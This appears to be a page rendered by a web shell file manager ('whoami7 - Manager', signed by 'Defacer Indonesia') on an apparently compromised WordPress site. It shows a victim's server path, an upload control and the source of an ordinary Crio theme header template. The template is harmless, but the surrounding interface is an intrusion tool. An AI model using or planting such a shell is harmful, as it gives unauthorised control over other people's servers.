whoami7 - Manager
:
/
home
/
qbizpnmr
/
public_html
/
wp-content
/
themes
/
crio
/
templates
/
Upload File:
files >> /home/qbizpnmr/public_html/wp-content/themes/crio/templates/page-header-blog.php
<?php /** * Blog Page Entry Header Template * * This file contains the markup for the blog page's entry header. * * @package Crio */ ?> <div <?php BoldGrid::add_class( 'page_header_wrapper', [ 'page-header-wrapper' ] ); ?>> <header <?php BoldGrid::add_class( 'blog_page_title', [ 'page-header', has_post_thumbnail( get_option( 'page_for_posts', true ) ) ? 'has-featured-image-header' : '' ] ) ?> <?php bgtfw_featured_img_bg( get_option( 'page_for_posts', true ), true ); ?>> <div <?php BoldGrid::add_class( 'featured_image', [ 'featured-imgage-header' ] ); ?>> <?php echo wp_kses_post( sprintf( // translators: %1$s is the element type, %2$s is the class string, %3$s is the title. '<%1$s %2$s>%3$s</%1$s>', apply_filters( 'bgtfw_blog_title_element', 'h1' ), BoldGrid::add_class( 'pages_title', array( 'page-title', esc_attr( get_theme_mod( 'bgtfw_global_title_size' ) ) ), false ), get_the_title( get_option( 'page_for_posts', true ) ) ) ); ?> </div> </header> </div>
Copyright ©2021 || Defacer Indonesia